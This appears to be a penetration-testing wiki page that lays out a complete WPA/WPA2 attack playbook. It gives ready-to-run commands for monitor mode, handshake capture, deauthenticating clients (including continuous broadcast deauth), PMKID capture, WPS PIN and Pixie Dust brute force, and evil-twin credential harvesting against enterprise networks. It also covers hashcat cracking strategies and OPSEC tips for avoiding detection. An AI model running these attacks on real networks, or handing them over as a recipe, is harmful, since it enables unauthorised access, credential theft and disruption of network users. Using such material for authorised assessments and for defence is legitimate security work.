WPA/WPA2 Cracking
#Overview
WPA and WPA2 (Wi-Fi Protected Access) remain the most common WiFi security protocols. WPA2-PSK (Pre-Shared Key) is vulnerable to offline dictionary attacks after capturing either a 4-way handshake or a PMKID. Enterprise WPA2 using 802.1X is vulnerable to EAP downgrade and evil twin attacks. WPS (Wi-Fi Protected Setup) adds another attack surface with PIN brute-force vulnerabilities.
This guide covers the complete attack chain from capture to cracking. For PMKID-specific attacks, see PMKID Attack. For WPA3/SAE attacks, see WPA3 Attacks. For enterprise 802.1X attacks, see 802.1X Attacks.
#Attack Decision Tree
WPA/WPA2 Target Identified
|
v
Is it Personal (PSK) or Enterprise (802.1X)?
|
|-- PSK
| |-- PMKID available? --> [PMKID Attack](pmkid-attack.md) (preferred, no deauth)
| |-- Connected clients? --> Capture 4-way handshake (this page)
| |-- WPS enabled? --> WPS PIN Attack (this page)
| |-- No clients, no PMKID --> Client attack / evil twin
|
|-- Enterprise (802.1X)
|-- See [802.1X Attacks](../network-segmentation/8021x-attacks.md)
|-- PEAP/GTC downgrade --> [Evil Twin](evil-twin-and-rogue-ap.md)
|-- EAP-TLS --> Certificate theft or forgery
TEXT
#Method 1: 4-Way Handshake Capture + Dictionary Attack
The classic WPA2-PSK attack — capture the 4-way EAPOL handshake, then crack offline.
#Step 1: Monitor Mode and Target Selection
# Start monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Identify target
sudo airodump-ng wlan0mon --encrypt wpa
BASH
#Step 2: Targeted Capture
# Lock to target channel and BSSID
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write wpa-target
# Watch for "WPA handshake: <AP_MAC>" in the top-right of airodump-ng
# This indicates the handshake was captured
BASH
#Step 3: Deauthentication (If No Handshake Yet)
# Targeted deauth (specific client)
sudo aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
# Broadcast deauth (disconnects ALL clients -- use with caution)
sudo aireplay-ng -0 10 -a <AP_MAC> wlan0mon
# Continuous deauth until handshake captured
sudo aireplay-ng -0 0 -a <AP_MAC> wlan0mon # 0 = infinite
BASH
#Step 4: Convert and Crack
# Convert capture to hashcat format
hcxpcapngtool -o wpa-target.hc22000 wpa-target-01.cap
# Basic dictionary attack
hashcat -m 22000 wpa-target.hc22000 /usr/share/wordlists/rockyou.txt
# With rules for mutation
hashcat -m 22000 wpa-target.hc22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule
# Targeted attack (common SSID + password combos)
# Generate PSK candidates based on SSID
hashcat -m 22000 wpa-target.hc22000 --stdout wordlist.txt | head -1
BASH
#Using aircrack-ng (Alternative)
# Older tool, still works for .cap files
aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-target-01.cap
BASH
#Method 2: PMKID Capture
PMKID is a simpler and stealthier attack — no deauthentication needed, no client required. See PMKID Attack for the full guide.
# Capture PMKID
sudo hcxdumptool -i wlan0mon -o pmkid-capture.pcapng --active_bids=1
# Convert to hashcat format
hcxpcapngtool -o pmkid.hc22000 pmkid-capture.pcapng
# Crack
hashcat -m 22000 pmkid.hc22000 wordlist.txt
BASH
#Method 3: WPS Pin Attack
WPS (Wi-Fi Protected Setup) allows brute-forcing an 8-digit PIN (reduced to ~11,000 combinations due to split validation). This is often faster than dictionary attacks against strong WPA2 passphrases.
#Reaver (WPS Pin Brute Force)
# Basic WPS attack
reaver -i wlan0mon -b <AP_MAC> -vv
# With specific channel
reaver -i wlan0mon -b <AP_MAC> -c <CH> -vv
# With delay (reduce detection)
reaver -i wlan0mon -b <AP_MAC> -d 5 -T 0.5 -vv
# Resume interrupted session
reaver -i wlan0mon -b <AP_MAC> -s /path/to/session/file -vv
BASH
#Pixie Dust Attack
Faster than full PIN brute force — exploits WPS protocol vulnerability in some APs.
# Pixie dust attack (much faster if AP is vulnerable)
reaver -i wlan0mon -b <AP_MAC> -K 1 -vv
# Using bully (alternative)
bully wlan0mon -b <AP_MAC> -d -v 3
BASH
#Bully (Alternative WPS Tool)
# Basic WPS attack with bully
bully wlan0mon -b <AP_MAC> -c <CH> -v 3
# Pixie dust with bully
bully wlan0mon -b <AP_MAC> -d -v 3
# Custom PIN range
bully wlan0mon -b <AP_MAC> --pinstart 00000000 --pinend 99999999 -v 3
BASH
#WPS Lockout Considerations
| AP Behavior | Lockout | Recovery Time |
|---|---|---|
| No lockout | None | N/A |
| Temporary lockout | After 3–10 failed attempts | 1–60 minutes |
| Permanent lockout | After N failed attempts | AP reboot required |
| WPS disabled | After lockout | Manual re-enable |
# Check if WPS is locked
wash -i wlan0mon -C -s
# If locked, wait and retry, or try a different approach
BASH
#Method 4: Enterprise WPA2-802.1X Attacks
Enterprise WPA2 uses 802.1X authentication (EAP-TLS, PEAP, EAP-TTLS, etc.). The primary attacks are EAP downgrade and evil twin credential harvesting. See 802.1X Attacks for full details.
#Quick Reference: EAP Downgrade with hostapd-wpe
# Set up evil twin with PEAP/GTC downgrade
# See [Evil Twin & Rogue AP](evil-twin-and-rogue-ap.md) for full setup
hostapd-wpe hostapd-wpe.conf
# Capture MS-CHAPv2 credentials in /tmp/hostapd-wpe.log
BASH
#Quick Reference: eaphammer
# Enterprise evil twin with credential harvesting
eaphammer --interface wlan0 \
--essid "<Corporate-SSID>" \
--channel <CH> \
--auth peap \
--wpa 2
BASH
#Hashcat Attack Modes Reference
| Hash Mode | Type | Hashcat Flag |
|---|---|---|
| WPA-PBKDF2 | PMKID/handshake | -m 22000 |
| WPA-PMK | Pre-computed PMK | -m 22001 |
| WPA-PBKDF2 (legacy .hc format) | Older format | -m 2500 (deprecated) |
#Hashcat Best Practices
# 1. Start with common passwords
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt
# 2. Apply rules for mutation
hashcat -m 22000 capture.hc22000 rockyou.txt \
-r /usr/share/hashcat/rules/best64.rule \
-r /usr/share/hashcat/rules/d3ad0ne.rule
# 3. Combinator attack (two wordlists)
hashcat -m 22000 capture.hc22000 -a 1 wordlist1.txt wordlist2.txt
# 4. Mask attack (patterns like Company2024!, SeasonMonth)
hashcat -m 22000 capture.hc22000 -a 3 '?u?l?l?l?d?d?d?d?s'
# 5. Session management (long-running attacks)
hashcat -m 22000 capture.hc22000 wordlist.txt --session wpa-crack
hashcat --session wpa-crack --restore # Resume
# 6. Show cracked results
hashcat -m 22000 capture.hc22000 --show
BASH
#Troubleshooting
| Problem | Cause | Solution |
|---|---|---|
| No handshake captured | No clients connected | Use deauth or wait for reconnection |
| Handshake captured but won't crack | Weak wordlist | Try larger wordlist or rules |
| "Mixed" handshake | Multiple BSSIDs | Specify --bssid in airodump-ng |
| Channel hopping | Monitor mode not fixed to channel | Use --channel <CH> in airodump-ng |
| Adapter not injecting | Driver doesn't support injection | Use Alfa AWUS036ACH or similar |
| hcxdumptool fails | Adapter doesn't support required features | Try different adapter or use airodump-ng |
#Common Pitfalls
- Weak wordlist: The #1 reason WPA2 cracking fails. Use large, targeted wordlists (rockyou.txt, SecLists, mentalist-generated).
- Incorrect channel: Always lock to the target channel. Channel hopping misses handshakes.
- Capture corruption: Use
hcxpcapngtoolto validate captures — it reports how many handshakes/PMKIDs were found. - WPA3 transition mode: Modern APs may advertise both WPA2 and WPA3. Focus on the WPA2 handshake.
- MFP (802.11w): If Management Frame Protection is required, deauthentication won't work. Use PMKID capture instead.
#OPSEC Considerations
- Deauthentication frames are logged by enterprise WIDS/WIPS (Cisco MSE, Aruba AirWave, etc.)
- WPS brute force creates thousands of association attempts — extremely noisy
- Evil twin APs appear as duplicate SSIDs, which trained staff may notice
- Hashcat GPU utilization is visible to endpoint monitoring
- Always verify timing windows with the engagement scope — avoid peak business hours for deauth attacks
#Cross-References
- PMKID Attack — Stealthier alternative to handshake capture
- Deauthentication Attacks — Detailed deauth techniques
- Evil Twin & Rogue AP — Enterprise credential harvesting
- WPA3 Attacks — Modern WPA3/SAE attacks
- 802.1X Attacks — Enterprise authentication exploitation
#Tool References
| Tool | Purpose | Link |
|---|---|---|
| aircrack-ng suite | Capture, deauth, crack | https://www.aircrack-ng.org/ |
| hcxdumptool / hcxtools | PMKID capture, hash conversion | https://github.com/ZerBea/hcxtools |
| hashcat | GPU hash cracking | https://hashcat.net/hashcat/ |
| reaver | WPS PIN brute force | https://github.com/t6x/reaver-wps-fork |
| bully | WPS PIN attack (alternative) | https://github.com/aanarchy99/bully |
| eaphammer | Enterprise evil twin | https://github.com/s0lst1c3/eaphammer |
| hostapd-wpe | Rogue AP with credential logging | https://github.com/OpenSecurityResearch/hostapd-wpe |
| wifite2 | Automated WiFi audit | https://github.com/derv82/wifite2 |
#Source Machines
- No specific HTB machines for WPA2-PSK cracking (requires physical wireless assessment)
- Enterprise 802.1X attacks applicable to AD environments — see 06 - Exploitation & Foothold